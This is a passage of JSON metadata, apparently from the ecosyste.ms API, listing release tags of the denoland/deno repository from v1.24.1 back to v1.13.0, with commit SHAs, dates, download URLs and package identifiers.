z/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@